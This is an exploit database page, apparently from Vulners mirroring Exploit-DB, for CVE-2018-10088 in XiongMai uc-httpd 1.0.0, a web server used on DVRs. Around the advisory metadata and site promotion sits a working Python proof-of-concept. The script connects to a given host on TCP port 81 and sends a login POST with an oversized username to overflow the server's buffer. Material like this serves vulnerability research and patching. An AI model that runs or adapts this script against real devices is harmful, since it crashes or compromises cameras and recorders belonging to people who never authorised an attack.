Vulners
Lucene search
XiongMai uc-httpd 1.0.0 - Buffer Overflow
๐๏ธย 08 Jun 2018ย 00:00:00Reported byย Andrew WatsonTypeย 
ย exploitdb๐ย www.exploit-db.com๐ย 192ย Views
| Reporter | Title | Published | Views | Family All 20 |
|---|---|---|---|---|
 | XiongMai uc-httpd 1.0.0 - Buffer Overflow Exploit | 9 Jun 201800:00 | โ | zdt |
 | Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Xiongmaitech Ahb7008F8-H_Firmware | 13 Apr 201807:43 | โ | githubexploit |
 | CVE-2018-10088 | 8 Jun 201800:00 | โ | attackerkb |
 | CVE-2018-10088 | 18 Jun 201809:04 | โ | circl |
 | XiongMai uc-httpd Buffer Overflow Vulnerability | 12 Jun 201800:00 | โ | cnvd |
 | XiongMai uc-httpd Buffer Overflow (CVE-2018-10088) | 29 Jul 201800:00 | โ | checkpoint_advisories |
 | CVE-2018-10088 | 8 Jun 201812:00 | โ | cve |
 | CVE-2018-10088 | 8 Jun 201812:00 | โ | cvelist |
 | XiongMai uc-httpd 1.0.0 - Buffer Overflow | 8 Jun 201800:00 | โ | exploitpack |
 | XiongMai uc-httpd 1.0.0 - Buffer Overflow | 2 Jun 202610:14 | โ | nuclei |
10
# Exploit Title: XiongMai uc-httpd 1.0.0 - Buffer Overflow
# Date: 2018-06-08
# Exploit Author: Andrew Watson
# Software Version: XiongMai uc-httpd 1.0.0
# Vendor Homepage: http://www.xiongmaitech.com/en/
# Tested on: KKMoon DVR running XiongMai uc-httpd 1.0.0 on TCP/81
# CVE ID: CVE-2018-10088
# DISCLAIMER: This proof of concept is provided for educational purposes only!
#!/usr/bin/python
import socket
import sys
payload="A" * 85
print "\n###############################################"
print "XiongMai uc-httpd 1.0.0 Buffer Overflow Exploit"
if len(sys.argv) < 2:
print "\nUsage: " + sys.argv[0] + " <Host>\n"
sys.exit()
print "\nTarget: " + sys.argv[1]
print "Sending exploit..."
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1],81))
s.send('POST /login.htm HTTP/1.1\r\n')
s.send('command=login&username=' + payload + '&password=PoC\r\n\r\n')
s.recv(1024)
s.close()
print "\nExploit complete!"
Data
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Jun 2018 00:00Current
9.6High risk
Vulners AI Score9.6
CVSS 39.8
CVSS 210
EPSS0.89463